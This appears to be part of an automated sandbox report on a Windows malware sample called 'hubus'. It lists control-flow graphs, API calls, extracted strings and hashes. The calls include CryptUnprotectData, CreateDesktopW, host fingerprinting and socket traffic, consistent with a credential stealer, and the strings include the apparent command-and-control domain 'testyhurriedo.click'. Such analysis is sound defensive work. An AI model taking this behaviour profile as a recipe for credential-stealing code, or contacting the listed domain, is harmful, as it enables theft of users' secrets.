14297 43c160 LdrInitializeThunk 14288->14297 14290 43f3cb 14289->14290 14292 43a8a0 RtlAllocateHeap 14289->14292 14293 43f1f9 14292->14293 14295 43f30e 14293->14295 14298 43c160 LdrInitializeThunk 14293->14298 14294 43a8d0 RtlFreeHeap 14294->14290 14295->14294 14297->14289 14298->14295 14299 4170b8 14306 415ed1 14299->14306 14301 43a920 3 API calls 14301->14306 14302 4176e9 14303 43ac40 LdrInitializeThunk 14303->14306 14304 43c160 LdrInitializeThunk 14304->14306 14305 416327 CreateProcessW 14305->14299 14305->14306 14306->14301 14306->14302 14306->14303 14306->14304 14306->14305 14307 43ab30 LdrInitializeThunk 14306->14307 14308 43acd0 LdrInitializeThunk 14306->14308 14309 41c0b0 14306->14309 14307->14306 14308->14306 14310 41c0f0 14309->14310 14310->14310 14311 40ac10 3 API calls 14310->14311 14312 41c315 14311->14312 14313 436db9 14314 436dd1 14313->14314 14315 436de8 GetUserDefaultUILanguage 14314->14315 14316 436e0e 14315->14316 14317 43c2fe 14318 43c307 GetForegroundWindow 14317->14318 14319 43c31a 14318->14319

Control-flow Graph (entry block 41f4b0; node legend: Executed / Not Executed; graph not reproduced)
APIs
• getaddrinfo.WS2_32(?,?,?,?), ref: 0041F544
• socket.WS2_32(?,FFFFFFFF,00000000), ref: 0041F5C0
• connect.WS2_32(00000000,?,?), ref: 0041F5D6
Strings
Memory Dump Source
• Source File: 00000001.00000002.12267535657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_hubus.jbxd
Similarity
• API ID: connectgetaddrinfosocket
• String ID: 31:;$6)0)$C*^|$G^$K@AF$SPBw$]o`z$`e:O$bWP$hyw{$jGAA$j|nd$ps"*$spsq$|xHc$~ezd
• API String ID: 3442012238-3735908906
• Opcode ID: 53b2bc7ce38ba8301f186daeda20eabb655fb0cee3e4cf776337617a46076f5f
• Instruction ID: 6c8cb3809aa182179536f77ea9d670f1b1b0665c40b2ce4c4df21e32de81a3e4
• Opcode Fuzzy Hash: 53b2bc7ce38ba8301f186daeda20eabb655fb0cee3e4cf776337617a46076f5f
• Instruction Fuzzy Hash: BC52277450C3818BC321CF25C8506AFBBE1AF96314F18467EE4E54B392D739994BCB96

Control-flow Graph (entry block 437b10; node legend: Executed / Not Executed; graph not reproduced)
APIs
• CoCreateInstance.OLE32(0044168C,00000000,00000001,0044167C,00000000), ref: 00437D84
• SysAllocString.OLEAUT32(5C045A0B), ref: 00437DF9
• CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00437E37
• SysAllocString.OLEAUT32(49F947F1), ref: 00437E85
• SysAllocString.OLEAUT32(18C206D6), ref: 00437F1B
• VariantInit.OLEAUT32(83828188), ref: 00437F87
• VariantClear.OLEAUT32(?), ref: 004380F5
• SysFreeString.OLEAUT32(00000000), ref: 0043811A
• SysFreeString.OLEAUT32(?), ref: 00438120
• SysFreeString.OLEAUT32(00000000), ref: 00438130
• GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0043816C
Strings
Memory Dump Source
• Source File: 00000001.00000002.12267535657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_hubus.jbxd
Similarity
• API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
• String ID: 6Z$6Z$;4$?jYl$C$UM$UM$z{|}
• API String ID: 2573436264-441414108
• Opcode ID: a633c24761fe19cdb29494bf90a08ae4ff31b84f00254bba1d2ed369a3c0b899
• Instruction ID: 32d1f029859c812e3577e43d14a4ed93bc1c567ea28ae8984151c89a2e27ba93
• Opcode Fuzzy Hash: a633c24761fe19cdb29494bf90a08ae4ff31b84f00254bba1d2ed369a3c0b899
• Instruction Fuzzy Hash: 77220FB6A083009FD314CF64D881B5BBBE6EFC9304F14892DF58587391EB78D9068B96

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 688 4170b8-4170bb 689 417410-41742a call 41c0b0 688->689 690 4170c2-4170cf 688->690 691 4172e7-417313 688->691 692 4171fc-417213 688->692 698 41742f-417435 689->698 695 4170d0-41715c 690->695 696 417320-4173ac 691->696 693 417220-4172ac 692->693 693->693 697 4172b2-4172ba 693->697 695->695 699 417162-41716e 695->699 696->696 700 4173b2-4173be 696->700 697->689 701 4172c0-4172cf 697->701 702 417440-417454 call 43a920 698->702 703 4171f0-4171f5 699->703 704 417174-41717f 699->704 705 4173c4-4173cf 700->705 706 415efa-415eff 700->706 708 4172d0-4172d7 701->708 730 4175d0-4175d4 702->730 731 4176c0-4176c5 702->731 732 4175b3-4175bf call 43ac40 702->732 733 417529-41753b 702->733 734 4176e9-4176ee 702->734 735 41745b-417468 702->735 736 4175db-4175ff 702->736 737 41746f-417486 702->737 738 41751f-417524 702->738 703->691 703->692 710 417180-417187 704->710 707 4173d0-4173d7 705->707 711 4162e7-4162e9 706->711 712 415f06 706->712 713 415f0c-415f23 706->713 715 415ed1-415ed7 707->715 716 4173dd-4173e0 707->716 718 4173e7-4173ed 708->718 719 4172dd-4172e0 708->719 721 417189-41718c 710->721 722 4171bc-4171c2 710->722 714 416313-416322 call 43ddb0 711->714 712->713 717 415f30-415f59 713->717 745 416327-416354 CreateProcessW 714->745 715->706 728 415ed9-415ef7 call 43c160 715->728 716->707 724 4173e2 716->724 717->717 725 415f5b-415f66 717->725 718->689 726 4173ef-417403 call 43c160 718->726 719->708 729 4172e2 719->729 721->710 739 41718e 721->739 722->703 723 4171c4-4171e6 call 43c160 722->723 723->703 724->706 741 415f68-415f6f 725->741 742 415f7b-415f88 725->742 726->689 728->706 729->689 730->731 730->734 730->736 731->730 731->731 731->732 731->733 731->735 731->736 731->737 731->738 746 4176cc-4176d2 
731->746 732->738 749 417540-41756f 733->749 735->730 735->731 735->732 735->733 735->734 735->736 735->737 735->738 743 417600-41768c 736->743 747 417490-4174d2 737->747 738->702 739->703 754 415f70-415f79 741->754 756 415f90-415f98 742->756 743->743 755 417692-41769d 743->755 745->688 745->711 758 41630c 745->758 760 4176d8 746->760 761 4162eb-416303 call 43c160 746->761 747->747 751 4174d4-4174df 747->751 749->749 759 417571-417578 749->759 767 4174e1-4174e5 751->767 768 4174fb-417518 call 43ab30 751->768 754->742 754->754 764 4176e0-4176e2 755->764 765 41769f-4176af 755->765 756->756 766 415f9a-415fc4 756->766 758->714 769 41758b-4175a0 call 43acd0 759->769 770 41757a-41757f 759->770 760->764 761->758 764->730 764->731 764->732 764->733 764->734 764->735 764->736 764->737 764->738 774 4176b0-4176b7 765->774 775 415fc6 766->775 776 415fcb-416062 call 407f70 766->776 772 4174f0-4174f9 767->772 768->730 768->731 768->732 768->733 768->734 768->736 768->738 782 4175a5-4175ac 769->782 777 417580-417589 770->777 772->768 772->772 774->746 779 4176b9-4176bc 774->779 775->776 785 416070-4160b4 776->785 777->769 777->777 779->774 783 4176be 779->783 782->730 782->731 782->732 782->734 782->736 783->764 785->785 786 4160b6-41612f 785->786 787 416130-416159 786->787 787->787 788 41615b-41616c 787->788 789 416191-41619e 788->789 790 41616e-416175 788->790 792 4161c1-4161d1 789->792 793 4161a0-4161a4 789->793 791 416180-41618f 790->791 791->789 791->791 795 4161f1-416201 792->795 796 4161d3-4161da 792->796 794 4161b0-4161bf 793->794 794->792 794->794 798 416221-416230 795->798 799 416203-41620a 795->799 797 4161e0-4161ef 796->797 797->795 797->797 801 416251-4162e0 798->801 802 416232-416239 798->802 800 416210-41621f 799->800 800->798 800->800 801->711 801->758 803 416240-41624f 802->803 803->801 803->803
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.12267535657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: D$LE$P<?$h$tG$mA$$
                                                                                                                                                                                                                                                              • API String ID: 0-1044959716
                                                                                                                                                                                                                                                              • Opcode ID: 3bd0eb7773a7f0eb342e4de9093c3f613f1c8c1523e55b296f09a1b9cac2ca65
                                                                                                                                                                                                                                                              • Instruction ID: 0ecf633a13486c36528b468c443e3b834273b6a7a3fb2a9ce7e8bc01757ec871
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3bd0eb7773a7f0eb342e4de9093c3f613f1c8c1523e55b296f09a1b9cac2ca65
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7B4255766083408FD724CF24C8907ABB7E2FFCA304F09896DE5C59B295DB789945CB86

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 0042D5F5
                                                                                                                                                                                                                                                              • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042D62F
                                                                                                                                                                                                                                                              • GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 0042D6EF
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.12267535657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ComputerName$FreeLibrary
                                                                                                                                                                                                                                                              • String ID: /g$:!?w$Z!Xt$^
                                                                                                                                                                                                                                                              • API String ID: 2243422189-1434922922
                                                                                                                                                                                                                                                              • Opcode ID: 19a61970159725aceee255d92c9b2e5e9dd3bcb96c21c50fd331cbd9fab3b85b
                                                                                                                                                                                                                                                              • Instruction ID: 4697a7a2b7991663a3431a9e595b2f93c3a4af1ad7168bdcbedf7ab2257885db
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 19a61970159725aceee255d92c9b2e5e9dd3bcb96c21c50fd331cbd9fab3b85b
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 60D10360A0C3E18AD7358F3994507ABBBE1AF97304F58489ED5CD97383C779440ACB66

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042D62F
                                                                                                                                                                                                                                                              • GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 0042D6EF
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.12267535657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ComputerName
                                                                                                                                                                                                                                                              • String ID: /g$:!?w$Z!Xt$^
                                                                                                                                                                                                                                                              • API String ID: 3545744682-1434922922
                                                                                                                                                                                                                                                              • Opcode ID: 0c50819a54f824eabe150f310b87649d1c7876c4f9f567aa1395634ca494eca6
                                                                                                                                                                                                                                                              • Instruction ID: 3aeb150c100e40f943150e07c445a2eecbbc4d003f70bf4eef6993bfc1ffacdd
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0c50819a54f824eabe150f310b87649d1c7876c4f9f567aa1395634ca494eca6
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ECD10720A0C3D18ED7258B3994517BBBBD19F97304F58496ED0CD9B383C779850AC76A

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.12267535657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                                              • String ID: D$LE$tG$mA
                                                                                                                                                                                                                                                              • API String ID: 2994545307-282404452
                                                                                                                                                                                                                                                              • Opcode ID: fa75395c2e3965a799225513f5818ed3bb8782f53bb49ec524cc1422d11b4c5c
                                                                                                                                                                                                                                                              • Instruction ID: 6ebcf6c4a4bbd5fc6d374ebe3adfe343ee093c1239a137f7424f43b33e1515bc
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fa75395c2e3965a799225513f5818ed3bb8782f53bb49ec524cc1422d11b4c5c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5BB17D70508340CFD324CF24C8A5BABBBF1FF86344F05895DE0859B2A2E7798945CB9A

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 004087AC
                                                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 004087B5
                                                                                                                                                                                                                                                              • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408869
                                                                                                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 0040887E
                                                                                                                                                                                                                                                                • Part of subcall function 0040C5E0: CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C5F3
                                                                                                                                                                                                                                                                • Part of subcall function 0040B3B0: FreeLibrary.KERNEL32(004088F5), ref: 0040B3B6
                                                                                                                                                                                                                                                                • Part of subcall function 0040B3B0: FreeLibrary.KERNEL32 ref: 0040B3D7
                                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0040890E
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.12267535657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CurrentFreeLibraryProcess$ExitFolderForegroundInitializePathSpecialThreadWindow
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3072701918-0

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 1325 40d0c6-40d0fa call 432d40 call 4094b0 CoUninitialize 1330 40d100-40d128 1325->1330 1330->1330 1331 40d12a-40d13b 1330->1331 1332 40d140-40d183 1331->1332 1332->1332 1333 40d185-40d1ea 1332->1333 1334 40d1f0-40d227 1333->1334 1334->1334 1335 40d229-40d23a 1334->1335 1336 40d25b-40d26e 1335->1336 1337 40d23c-40d24a 1335->1337 1339 40d270-40d271 1336->1339 1340 40d28b-40d295 1336->1340 1338 40d250-40d259 1337->1338 1338->1336 1338->1338 1341 40d280-40d289 1339->1341 1342 40d297-40d29b 1340->1342 1343 40d2ab-40d2b3 1340->1343 1341->1340 1341->1341 1344 40d2a0-40d2a9 1342->1344 1345 40d2b5-40d2b6 1343->1345 1346 40d2cb-40d2d5 1343->1346 1344->1343 1344->1344 1347 40d2c0-40d2c9 1345->1347 1348 40d2d7-40d2db 1346->1348 1349 40d2eb-40d2f7 1346->1349 1347->1346 1347->1347 1350 40d2e0-40d2e9 1348->1350 1351 40d311-40d431 1349->1351 1352 40d2f9-40d2fb 1349->1352 1350->1349 1350->1350 1353 40d440-40d461 1351->1353 1354 40d300-40d30d 1352->1354 1353->1353 1356 40d463-40d47f 1353->1356 1354->1354 1355 40d30f 1354->1355 1355->1351 1357 40d480-40d4a1 1356->1357 1357->1357 1358 40d4a3-40d4c6 call 40b3e0 1357->1358 1360 40d4cb-40d4ec 1358->1360
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.12267535657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Uninitialize
                                                                                                                                                                                                                                                              • String ID: 67$testyhurriedo.click$~zpH
                                                                                                                                                                                                                                                              • API String ID: 3861434553-2181984717

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 1361 424010-424062 1362 424070-424096 1361->1362 1362->1362 1363 424098-4240e2 1362->1363 1365 4240f0-424143 1363->1365 1365->1365 1366 424145-424150 1365->1366 1367 4244a2-4244ae 1366->1367 1368 4241c2-4241ca 1366->1368 1369 4241a0 1366->1369 1370 4241c0 1366->1370 1371 4242c0 1366->1371 1372 4241a6 1366->1372 1373 4242c6-4242cd 1366->1373 1374 4244af-42455f 1366->1374 1375 4241ac-4241b2 call 407f80 1366->1375 1376 4242d6-4242de 1366->1376 1377 424157-42415c 1366->1377 1378 424474 1366->1378 1379 4241b5-4241bf 1366->1379 1380 424498-42449f 1366->1380 1381 424458-42446d 1366->1381 1382 4241d3 1368->1382 1383 4241cc-4241d1 1368->1383 1369->1372 1372->1375 1373->1376 1393 424560-4245ac 1374->1393 1375->1379 1394 4242e0-4242e5 1376->1394 1395 4242e7 1376->1395 1391 424165 1377->1391 1392 42415e-424163 1377->1392 1379->1370 1384 4244a0 1380->1384 1381->1367 1381->1378 1381->1380 1381->1384 1385 424737 1381->1385 1386 42447a-424480 call 407f80 1381->1386 1387 424489 1381->1387 1388 4245ce-4245e6 1381->1388 1389 42448f-424495 call 407f80 1381->1389 1390 42473d-424746 call 407f80 1381->1390 1398 4241da-424211 call 407f70 1382->1398 1383->1398 1386->1387 1404 4245f0-42464b 1388->1404 1389->1380 1401 424168-42418c call 407f70 1391->1401 1392->1401 1393->1393 1402 4245ae-4245be call 4223a0 1393->1402 1403 4242ee-42439b call 407f70 1394->1403 1395->1403 1419 424220-42423e 1398->1419 1401->1368 1401->1369 1401->1370 1401->1371 1401->1372 1401->1373 1401->1374 1401->1375 1401->1376 1401->1378 1401->1379 1401->1380 1401->1381 1416 4245c3-4245c6 1402->1416 1420 4243a0-4243d6 1403->1420 1404->1404 1413 42464d-4246d3 1404->1413 1418 4246e0-42470a 1413->1418 1416->1388 1418->1418 1421 42470c-42472f call 422060 
1418->1421 1419->1419 1422 424240-424248 1419->1422 1420->1420 1424 4243d8-4243e0 1420->1424 1421->1385 1426 424261-42426e 1422->1426 1427 42424a-42424f 1422->1427 1428 4243e2-4243e9 1424->1428 1429 424401-42440e 1424->1429 1432 424270-424274 1426->1432 1433 424291-42429c call 43f7c0 1426->1433 1431 424250-42425f 1427->1431 1434 4243f0-4243ff 1428->1434 1435 424410-424414 1429->1435 1436 424431-424451 GetLogicalDrives call 43f7c0 1429->1436 1431->1426 1431->1431 1439 424280-42428f 1432->1439 1442 4242a1-4242ad 1433->1442 1434->1429 1434->1434 1437 424420-42442f 1435->1437 1436->1367 1436->1378 1436->1380 1436->1381 1436->1384 1436->1385 1436->1386 1436->1387 1436->1388 1436->1389 1436->1390 1437->1436 1437->1437 1439->1433 1439->1439 1442->1371 1442->1373 1442->1374 1442->1376 1442->1378 1442->1381 1442->1386 1442->1388
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.12267535657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: BB$UG
                                                                                                                                                                                                                                                              • API String ID: 0-4103563041

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 1443 419f2f-419f37 call 407f80 1446 41a05a-41a074 1443->1446 1447 41a080-41a10c 1446->1447 1447->1447 1448 41a112-41a121 1447->1448 1449 41a127-41a136 1448->1449 1450 41a1aa-41a213 call 401a60 1448->1450 1452 41a140-41a147 1449->1452 1457 41a220-41a23f 1450->1457 1454 41a149-41a14c 1452->1454 1455 41a18e-41a194 1452->1455 1454->1452 1458 41a14e 1454->1458 1455->1450 1456 41a196-41a1a7 call 43c160 1455->1456 1456->1450 1457->1457 1460 41a241-41a25a call 401da0 1457->1460 1458->1450 1464 41a261-41a263 1460->1464 1465 419f48-419faf 1460->1465 1466 41a42d 1460->1466 1468 41a270-41a276 1464->1468 1467 419fb0-41a015 1465->1467 1470 41a434 1466->1470 1467->1467 1469 41a017-41a03c call 401da0 1467->1469 1468->1468 1471 41a278-41a289 1468->1471 1469->1465 1477 41a043-41a053 1469->1477 1478 419f3c-419f45 call 407f80 1469->1478 1470->1470 1473 41a290 1471->1473 1474 41a28b-41a28e 1471->1474 1476 41a291-41a29d 1473->1476 1474->1473 1474->1476 1479 41a2a4 1476->1479 1480 41a29f-41a2a2 1476->1480 1477->1446 1477->1464 1477->1465 1477->1466 1482 41a150-41a187 call 407f70 call 43fad0 1477->1482 1483 419f0d-419f21 call 401000 1477->1483 1484 419efc 1477->1484 1485 419f2e 1477->1485 1478->1465 1481 41a2a5-41a2c7 call 407f70 1479->1481 1480->1479 1480->1481 1495 41a3c7-41a3fe call 43ddb0 1481->1495 1496 41a2cd-41a2d4 1481->1496 1482->1446 1482->1450 1482->1464 1482->1465 1482->1466 1482->1483 1482->1484 1482->1485 1483->1485 1484->1483 1485->1443 1501 41a403-41a423 CryptUnprotectData 1495->1501 1498 41a2f0-41a334 call 41e6e0 * 2 1496->1498 1505 41a2e0-41a2ea 1498->1505 1506 41a336-41a351 call 41e6e0 1498->1506 1501->1466 1505->1495 1505->1498 1506->1505 1509 41a353-41a37b 1506->1509 1510 41a381-41a397 call 41e6e0 
1509->1510 1511 41a2da-41a2df 1509->1511 1514 41a2d6 1510->1514 1515 41a39d-41a3c2 1510->1515 1511->1505 1514->1511 1515->1505
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.12267535657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: pzs$
                                                                                                                                                                                                                                                              • API String ID: 0-1216481787
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CreateDesktopW.USER32(?,00000000,00000000,00000000,000F00C7,00000000), ref: 0041BE35
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.12267535657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CreateDesktop
                                                                                                                                                                                                                                                              • String ID: _
                                                                                                                                                                                                                                                              • API String ID: 3054513912-701932520
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 0041C805
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.12267535657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: setsockopt
                                                                                                                                                                                                                                                              • String ID: vJrs
                                                                                                                                                                                                                                                              • API String ID: 3981526788-3323466680
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • recv.WS2_32(?,?,00000002,00000008), ref: 0041EB75
                                                                                                                                                                                                                                                              • recv.WS2_32(?,?,00000002,00000008), ref: 0041EBFF
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.12267535657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: recv
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1507349165-0
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • send.WS2_32(?,?,?,00000000), ref: 0041EA63
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.12267535657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: send
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2809346765-0
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • recv.WS2_32(?,?,00001000,00000008), ref: 004201F3
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.12267535657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: recv
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1507349165-0
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • LdrInitializeThunk.NTDLL(0043F5B8,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043C18E
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.12267535657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(?,00000000,?,?,0043C140), ref: 0043A8B0
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.12267535657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • select.WS2_32(?,JrA,00000000,00000000,00000000), ref: 0041CC32
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.12267535657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: select
                                                                                                                                                                                                                                                              • String ID: JrA
                                                                                                                                                                                                                                                              • API String ID: 1274211008-1249927954
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetUserDefaultUILanguage.KERNELBASE ref: 00436DE8
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.12267535657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: DefaultLanguageUser
                                                                                                                                                                                                                                                              • String ID: rX]^
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 0043C30C
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
